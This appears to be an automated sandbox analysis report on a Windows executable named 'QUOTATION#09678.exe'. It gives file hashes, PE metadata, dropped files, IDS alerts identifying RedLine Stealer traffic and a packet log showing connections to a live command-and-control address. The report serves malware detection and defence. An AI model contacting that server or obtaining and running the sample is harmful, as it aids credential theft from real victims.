                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEF4D.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\tmpEF5E.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.421815411500204
                                                            Encrypted:false
                                                            SSDEEP:6144:MSvfpi6ceLP/9skLmb0OTDWSPHaJG8nAgeMZMMhA2fX4WABlEnNQ0uhiTw:3vloTDW+EZMM6DFye03w
                                                            MD5:7A15CE9C933C39BAA99D3FF79DCEAD0A
                                                            SHA1:6E82A17CA2B79FF7FC2190D3EFEF6E980C9F034F
                                                            SHA-256:A5D123EC2DB47C12E4C4A89C89ACC2736325613350188F81FE8714E739534B72
                                                            SHA-512:79C9191A19C0AE1EE459D6DE66B7CDA3795F31BDDC1909299F27F33DAFB9A4F73F46B623B2E84AB1F144F5AE9485D61FCE3F951F498BEC68CB0EC3D86446D363
                                                            Malicious:false
                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"Mw.0,................................................................................................................................................................................................................................................................................................................................................`.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):4.341968188574336
                                                            TrID:
                                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                            • Win64 Executable Console (202006/5) 47.64%
                                                            • Win64 Executable (generic) (12005/4) 2.83%
                                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                                            • DOS Executable Generic (2002/1) 0.47%
                                                            File name:QUOTATION#09678.exe
                                                            File size:2'789'519 bytes
                                                            MD5:4e5909728a72eb29f5cf1fe01867c982
                                                            SHA1:8d0638e33dd590d0ca6ad6918d7e3e25762613d4
                                                            SHA256:e87c540a4074fccadf3a56a1a0ef71bc952382d21c366c2a969e8d52bb25d609
                                                            SHA512:51f58be1e03e72a50d37599d3ffa91bcdb604e09e50e76557a38933077c7479e26b3a399b830ef7d4b4d4ef0588c624746a901199473414fc2156ddc72a5ddf1
                                                            SSDEEP:12288:xnjVswcPUvDQVeGqHmPkaoyyMO/xA3lhSWN54ae:xjWwcPuDoAaoXaqWN54p
                                                            TLSH:A5D5F0923E07AD27BC081622D5E976FD06FE4C2F7CF1A21FCF596EA586621BC1152831
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....f#g.........."...0..(............... ....@...... ..............................U.*...`................................

                                                            File Icon

                                                            Icon Hash:443ad8d4dc581348

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x400000
                                                            Entrypoint Section:
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x672366A9 [Thu Oct 31 11:14:49 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:

                                                            Entrypoint Preview

                                                            Instruction
                                                            dec ebp
                                                            pop edx
                                                            nop
                                                            add byte ptr [ebx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax+eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x10ed6.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x48020x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x28a20x2a00737d4fcd51db6f82f757feda29d93406False0.6140252976190477data6.206106925982057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x60000x10ed60x11000586ceefc155839d55247d98b790ae17bFalse0.06168141084558824data3.200143032892522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x61440x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.05199337513308885
                                                            RT_GROUP_ICON0x1696c0x14data1.15
                                                            RT_VERSION0x169800x36cdata0.3938356164383562
                                                            RT_MANIFEST0x16cec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-01T08:37:02.327438+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.54970494.141.120.655123TCP
                                                            2024-11-01T08:37:07.276183+01002045000ET MALWARE RedLine Stealer - CheckConnect Response194.141.120.655123192.168.2.549704TCP
                                                            2024-11-01T08:37:07.762128+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.54970494.141.120.655123TCP
                                                            2024-11-01T08:37:10.843296+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound194.141.120.655123192.168.2.549704TCP
                                                            2024-11-01T08:37:10.843296+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)194.141.120.655123192.168.2.549704TCP
                                                            2024-11-01T08:37:10.894641+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.54971294.141.120.655123TCP
                                                            2024-11-01T08:37:15.616264+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549714TCP
                                                            2024-11-01T08:37:23.636487+01002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.54975494.141.120.655123TCP
                                                            2024-11-01T08:37:53.032015+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.549907TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 1, 2024 08:37:00.696050882 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:00.701221943 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:00.701345921 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:00.716768026 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:00.721739054 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:01.062201023 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:01.067310095 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:02.174566984 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:02.327438116 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:07.270844936 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:07.270886898 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:07.276182890 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:07.276201010 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:07.761944056 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:07.761967897 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:07.761976004 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:07.761986971 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:07.761993885 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:07.762128115 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.837793112 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.837796926 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.842762947 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.842891932 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.843296051 CET551234970494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.843554974 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.843555927 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.843709946 CET4970455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.848380089 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848390102 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848433018 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848442078 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848448992 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848460913 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848469973 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.848490000 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.848623991 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848633051 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848640919 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.848655939 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.848679066 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.848704100 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.853143930 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.853249073 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.853343010 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.853367090 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.853369951 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.853370905 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.853373051 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.853382111 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.853472948 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.894407034 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.894640923 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.942322969 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.942656040 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:10.995064020 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:10.995304108 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:11.042387009 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:11.042516947 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:11.090372086 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:11.090797901 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:11.138484001 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:11.140851021 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:11.186655045 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:11.186726093 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:11.501812935 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.108704090 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.231906891 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.232029915 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.232104063 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.232265949 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.232275009 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.237214088 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.237221956 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.237262964 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.237289906 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.242119074 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.242170095 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.242177963 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.242213011 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.246995926 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.247039080 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.247129917 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.247188091 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.251944065 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.251960993 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.251996040 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.252011061 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.256906033 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.256923914 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.256983995 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.261749983 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.261799097 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.261883020 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.261929035 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.266674995 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.266746998 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.266792059 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.266839981 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.271965027 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.271975994 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.271981955 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.272023916 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.272053003 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.276892900 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.276912928 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.276920080 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.276976109 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.276993036 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.277070045 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.281866074 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.281889915 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.281898022 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.281919003 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.281951904 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.281994104 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.282001972 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.282046080 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.286813974 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.286823988 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.286839962 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.286849022 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.286879063 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.286907911 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.286946058 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.286956072 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.286992073 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.291743040 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.291793108 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.291798115 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.291806936 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.291843891 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.291871071 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.291914940 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.291940928 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.291949987 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.291991949 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.296698093 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.296706915 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.296721935 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.296730042 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.296756983 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.296797991 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.296866894 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.296875000 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.296890020 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.296916008 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.296933889 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.301659107 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301667929 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301682949 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301691055 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301726103 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.301783085 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301826954 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.301860094 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301868916 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301886082 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301893950 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.301901102 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.301935911 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.306683064 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306690931 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306740046 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306740046 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.306751966 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306778908 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.306812048 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.306819916 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306837082 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306854963 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306862116 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.306863070 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306870937 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.306876898 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306885004 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.306902885 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.306922913 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.311672926 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311681986 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311691046 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311693907 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311727047 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311739922 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311760902 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.311800003 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.311902046 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311919928 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311928034 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311935902 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.311954975 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.311969042 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.316600084 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316629887 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316646099 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316648006 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.316659927 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316668987 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316683054 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316690922 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316699028 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.316709042 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.316734076 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.316762924 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316797018 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.316909075 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316916943 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316921949 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.316952944 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.321619034 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321630955 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321649075 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321666002 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.321675062 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321682930 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321692944 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.321698904 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321706057 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.321706057 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321736097 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.321749926 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.321763039 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321794033 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321799040 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:12.321801901 CET551234971294.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:12.321814060 CET551234971294.141.120.6192.168.2.5
